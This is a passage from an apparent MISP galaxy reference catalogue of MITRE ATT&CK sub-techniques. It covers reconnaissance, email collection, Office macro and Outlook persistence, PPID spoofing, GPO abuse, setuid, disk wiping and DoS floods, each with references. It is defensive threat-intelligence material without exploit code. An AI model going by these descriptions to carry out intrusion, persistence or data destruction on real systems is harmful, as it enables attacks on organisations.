Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Network Security Appliances - T1590.006"

Table 3397. Table References
Links
https://attack.mitre.org/techniques/T1590/006
https://nmap.org/book/firewalls.html

Network Device CLI - T1059.008

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.

Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)

The tag is: misp-galaxy:mitre-attack-pattern="Network Device CLI - T1059.008"

Table 3398. Table References
Links
https://attack.mitre.org/techniques/T1059/008
https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
https://tools.cisco.com/security/center/resources/integrity_assurance.html#23

Local Email Collection - T1114.001

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in C:\Users\<username>\Documents\Outlook Files or C:\Users\<username>\AppData\Local\Microsoft\Outlook.(Citation: Microsoft Outlook Files)

The tag is: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001"

Table 3399. Table References
Links
https://attack.mitre.org/techniques/T1114/001
https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/
https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790

Remote Email Collection - T1114.002

Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user’s credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.

The tag is: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002"

Table 3400. Table References
Links
https://attack.mitre.org/techniques/T1114/002

Compiled HTML File - T1218.001

Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001"

Table 3401. Table References
Links
https://attack.mitre.org/techniques/T1218/001
https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk
https://msdn.microsoft.com/windows/desktop/ms644670
https://msdn.microsoft.com/windows/desktop/ms524405
https://msitpros.com/?p=3909
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625

Email Forwarding Rule - T1114.003

Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim’s emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)

The tag is: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003"

Table 3402. Table References
Links
https://attack.mitre.org/techniques/T1114/003
https://www.us-cert.gov/ncas/alerts/TA18-086A
https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac

Office Template Macros - T1137.001

Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)

Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019)

Word Normal.dotm location:<br> <code>C:\Users<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>

Excel Personal.xlsb location:<br> <code>C:\Users<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>

Adversaries may also change the location of the base template to point to their own by hijacking the application’s search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019)

An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.

The tag is: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001"

Table 3403. Table References
Links
https://attack.mitre.org/techniques/T1137/001
https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943

System Language Discovery - T1614.001

Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)

There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019)

For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language</code> or parsing the outputs of Windows API functions <code>GetUserDefaultUILanguage</code>, <code>GetSystemDefaultUILanguage</code>, <code>GetKeyboardLayoutList</code> and <code>GetUserDefaultLangID</code>.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)

On a macOS or Linux system, adversaries may query <code>locale</code> to retrieve the value of the <code>$LANG</code> environment variable.

The tag is: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001"

Table 3404. Table References
Links
https://attack.mitre.org/techniques/T1614/001
https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/
https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware
https://securelist.com/evolution-of-jsworm-ransomware/102428/
https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/

Disk Content Wipe - T1561.001

Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001"

Table 3405. Table References
Links
https://attack.mitre.org/techniques/T1561/001
https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
https://www.justice.gov/opa/press-release/file/1092091/download
https://docs.microsoft.com/sysinternals/downloads/sysmon

Security Software Discovery - T1518.001

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)

The tag is: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001"

Table 3406. Table References
Links
https://attack.mitre.org/techniques/T1518/001
https://capec.mitre.org/data/definitions/581.html
https://expel.io/blog/finding-evil-in-aws/

Determine Physical Locations - T1591.001

Adversaries may gather the victim’s physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).

The tag is: misp-galaxy:mitre-attack-pattern="Determine Physical Locations - T1591.001"

Table 3407. Table References
Links
https://attack.mitre.org/techniques/T1591/001
https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
https://www.sec.gov/edgar/search-and-access

Credentials In Files - T1552.001

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)

In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)

The tag is: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001"

Table 3408. Table References
Links
https://attack.mitre.org/techniques/T1552/001
https://capec.mitre.org/data/definitions/639.html
http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html
http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx
https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/
https://posts.specterops.io/head-in-the-clouds-bd038bb69e48

Disk Structure Wipe - T1561.002

Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002"

Table 3409. Table References
Links
https://attack.mitre.org/techniques/T1561/002
https://www.symantec.com/connect/blogs/shamoon-attacks
https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html
http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf
https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
https://docs.microsoft.com/sysinternals/downloads/sysmon

Parent PID Spoofing - T1134.004

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](Rundll32(https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)

Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004"

Table 3410. Table References
Links
https://attack.mitre.org/techniques/T1134/004
https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/
https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works
https://www.countercept.com/blog/detecting-parent-pid-spoofing/
https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/
https://blog.xpnsec.com/becoming-system/
https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3

Outlook Home Page - T1137.004

Adversaries may abuse Microsoft Outlook’s Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)

Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)

The tag is: misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004"

Table 3411. Table References
Links
https://attack.mitre.org/techniques/T1137/004
https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
https://github.com/sensepost/notruler

Identify Business Tempo - T1591.003

Adversaries may gather information about the victim’s business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))

The tag is: misp-galaxy:mitre-attack-pattern="Identify Business Tempo - T1591.003"

Table 3412. Table References
Links
https://attack.mitre.org/techniques/T1591/003
https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

Group Policy Modification - T1484.001

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path <code>\<DOMAIN>\SYSVOL<DOMAIN>\Policies\</code>.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)

Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.

Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)

For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code><GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code><GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary’s control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)

The tag is: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001"

Table 3413. Table References
Links
https://attack.mitre.org/techniques/T1484/001
https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
https://adsecurity.org/?p=2716
https://wald0.com/?p=179
http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/
http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/

Setuid and Setgid - T1548.001

An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.

Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file’s attributes via <code>ls -l</code>. The <code>chmod</code> program can set these bits with via bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>.

Adversaries can use this mechanism on their own malware to make sure they’re able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).

The tag is: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001"

Table 3414. Table References
Links
https://attack.mitre.org/techniques/T1548/001
http://man7.org/linux/man-pages/man2/setuid.2.html
https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Direct Network Flood - T1498.001

Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service’s network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.

Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Direct Network Flood - T1498.001"

Table 3415. Table References
Links
https://attack.mitre.org/techniques/T1498/001
https://capec.mitre.org/data/definitions/125.html
https://capec.mitre.org/data/definitions/486.html
https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

OS Exhaustion Flood - T1499.001

Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.

Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)

ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)

The tag is: misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001"

Table 3416. Table References
Links
https://attack.mitre.org/techniques/T1499/001
https://capec.mitre.org/data/definitions/469.html
https://capec.mitre.org/data/definitions/482.html
https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/
https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

Domain Controller Authentication - T1556.001

Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.

Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001"

Table 3417. Table References
Links
https://attack.mitre.org/techniques/T1556/001
https://www.secureworks.com/research/skeleton-key-malware-analysis
https://technet.microsoft.com/en-us/library/dn487457.aspx

Stored Data Manipulation - T1565.001

Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001"

Table 3418. Table References
Links
https://attack.mitre.org/techniques/T1565/001
https://content.fireeye.com/apt/rpt-apt38
https://www.justice.gov/opa/press-release/file/1092091/download

Social Media Accounts - T1585.001

